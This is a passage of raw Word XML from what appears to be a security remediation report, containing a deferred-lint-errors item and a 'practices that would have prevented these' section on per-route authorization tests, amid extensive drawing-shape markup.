                  <wp:posOffset>-19628</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="876300" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26398" name="Group 26398"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="876300" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="876300" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2871" name="Shape 2871"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="876300" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="876300" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="866775" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="869405" y="0"/>
                                  <a:pt x="871651" y="930"/>
                                  <a:pt x="873510" y="2766"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="875370" y="4626"/>
                                  <a:pt x="876300" y="6883"/>
                                  <a:pt x="876300" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="876300" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="876300" y="126442"/>
                                  <a:pt x="875370" y="128674"/>
                                  <a:pt x="873510" y="130535"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="871651" y="132395"/>
                                  <a:pt x="869405" y="133325"/>
                                  <a:pt x="866775" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133325"/>
                                  <a:pt x="4650" y="132395"/>
                                  <a:pt x="2790" y="130535"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128674"/>
                                  <a:pt x="0" y="126442"/>
                                  <a:pt x="0" y="123825"/>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398" style="width:69pt;height:10.5pt;position:absolute;z-index:-2147483631;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:200.93pt;mso-position-vertical-relative:text;margin-top:-1.5456pt;" coordsize="8763,1333">
                <v:shape id="Shape 2871" style="position:absolute;width:8763;height:1333;left:0;top:0;" coordsize="876300,133350" path="m9525,0l866775,0c869405,0,871651,930,873510,2766c875370,4626,876300,6883,876300,9525l876300,123825c876300,126442,875370,128674,873510,130535c871651,132395,869405,133325,866775,133350l9525,133350c6895,133325,4650,132395,2790,130535c930,128674,0,126442,0,123825l0,9525c0,6883,930,4626,2790,2766c4650,930,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>NF-6 · ~126 pre-existing lint errors.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Almost all </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>no</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-unused-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">vars </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20477D09" w14:textId="5BA8D399" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="942"/>
        <w:ind w:left="24" w:right="16"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Why not:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> none are security </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>defects, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> clearing them would touch dozens of files this remediation has no other reason to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>change  burying</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the security diff and making it unreviewable. </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mitigated:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the security rules got their own config and their own CI gate </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>lint</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:proofErr w:type="spell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which passes clean. The cleanup can be scheduled on its own merits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719486FA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0" w:rsidP="00674944">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:left="24"/>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8. Practices that would have prevented these</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D23630" w14:textId="77777777" w:rsidR="00674944" w:rsidRPr="00674944" w:rsidRDefault="00674944" w:rsidP="00674944">
      <w:pPr/>
    </w:p>
    <w:p w14:paraId="47D061E1" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:ind w:left="24"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most useful question is not "what was wrong" but "what would have caught it". Several findings point </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the same few gaps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC12B1E" w14:textId="3D647A64" w:rsidR="00674944" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>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Authorization asserted by tests, not by intention.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2047BD1F" w14:textId="100F7E14" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0" w:rsidP="00674944">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V-02 is the sharpest lesson in this report: the control was designed, implemented and registered, then not </w:t>
      </w:r>
      <w:r w:rsidR="0011533D" w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>connected and</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nothing noticed for months</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. No scanner catches this, because a scanner cannot know which routes ought to be privileged. A single test per privileged route </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>assert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> an employee gets </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">403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would have failed on day one. We wrote 22 such tests; they are cheap and they are the only thing that makes "who can call this?" a question with an enforced answer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9B7AC" w14:textId="27B2D761" w:rsidR="00674944" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="222" w:right="16" w:hanging="208"/>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42560" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7EE13679" wp14:editId="12FD7337">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>542032</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152357</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1276350" cy="485775"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26402" name="Group 26402"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1276350" cy="485775"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1276350" cy="485775"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2903" name="Shape 2903"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1276350" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1276350" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1266825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1269455" y="0"/>
                                  <a:pt x="1271700" y="930"/>
                                  <a:pt x="1273560" y="2766"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1275420" y="4626"/>
                                  <a:pt x="1276350" y="6883"/>
                                  <a:pt x="1276350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1276350" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1276350" y="126442"/>
                                  <a:pt x="1275420" y="128699"/>
                                  <a:pt x="1273560" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1271700" y="132420"/>
                                  <a:pt x="1269455" y="133350"/>
                                  <a:pt x="1266825" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="128699"/>
                                  <a:pt x="0" y="126442"/>
                                  <a:pt x="0" y="123825"/>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s:wsp>
                        <wps:cNvPr id="2913" name="Shape 2913"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="238125" y="342900"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2766"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4626"/>
                                  <a:pt x="581025" y="6883"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135967"/>
                                  <a:pt x="580095" y="138199"/>
                                  <a:pt x="578235" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141920"/>
                                  <a:pt x="574130" y="142850"/>
                                  <a:pt x="571500" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142850"/>
                                  <a:pt x="4650" y="141920"/>
                                  <a:pt x="2790" y="140060"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138199"/>
                                  <a:pt x="0" y="135967"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6883"/>
                                  <a:pt x="930" y="4626"/>
                                  <a:pt x="2790" y="2766"/>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w:pict>
              <v:group w14:anchorId="6395A4A0" id="Group 26402" o:spid="_x0000_s1026" style="position:absolute;margin-left:42.7pt;margin-top:12pt;width:100.5pt;height:38.25pt;z-index:-251473920" coordsize="12763,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&#10;">
                <v:shape id="Shape 2903" o:spid="_x0000_s1027" style="position:absolute;width:12763;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1276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upxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvgv9heUIvpd1YRdrYbbGFFvFQte2lt2f2mQSzb0P2mW7/vSsIHoeZ+YaZL6NrVE9dqD0buB1n&#10;oIgLb2suDRwPm9EUVBBki41nMnChAMvF9dUcc+vP/E79XkqVIBxyNFCJtLnWoajIYRj7ljh5n75z&#10;KEl2pbYdnhPcNXqSZQ/aYc1pocKW1hUVX/tvZ2C76l/jyynK7r7g4VA++u3bRRszuIlPj6CEovyH&#10;/9rP1sBklt3B75v0BPTiBwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAF8EW6nHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l1266825,v2630,,4875,930,6735,2766c1275420,4626,1276350,6883,1276350,9525r,114300c1276350,126442,1275420,128699,1273560,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126442,,123825l,9525c,6883,930,4626,2790,2766,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1276350,133350"/>
                </v:shape>
                <v:shape id="Shape 2913" o:spid="_x0000_s1028" style="position:absolute;left:2381;top:3429;width:5810;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="58102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R5MxwAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9bawIx&#10;FITfC/6HcIS+FM1qi+jWKFoQCn3wDn083Zzuxc3JkqS6/nsjFHwcZuYbZjpvTS3O5HxpWcGgn4Ag&#10;zqwuOVdw2K96YxA+IGusLZOCK3mYzzpPU0y1vfCWzruQiwhhn6KCIoQmldJnBRn0fdsQR+/XOoMh&#10;SpdL7fAS4aaWwyQZSYMlx4UCG/ooKDvt/oyC/fb487ZZf1fVZPOycNVyvfpiqdRzt128gwjUhkf4&#10;v/2pFQwng1e4v4lPQM5uAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhABmZHkzHAAAA3QAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" path="m9525,l571500,v2630,,4875,930,6735,2766c580095,4626,581025,6883,581025,9525r,123825c581025,135967,580095,138199,578235,140060v-1860,1860,-4105,2790,-6735,2815l9525,142875v-2630,-25,-4875,-955,-6735,-2815c930,138199,,135967,,133350l,9525c,6883,930,4626,2790,2766,4650,930,6895,,9525,xe" 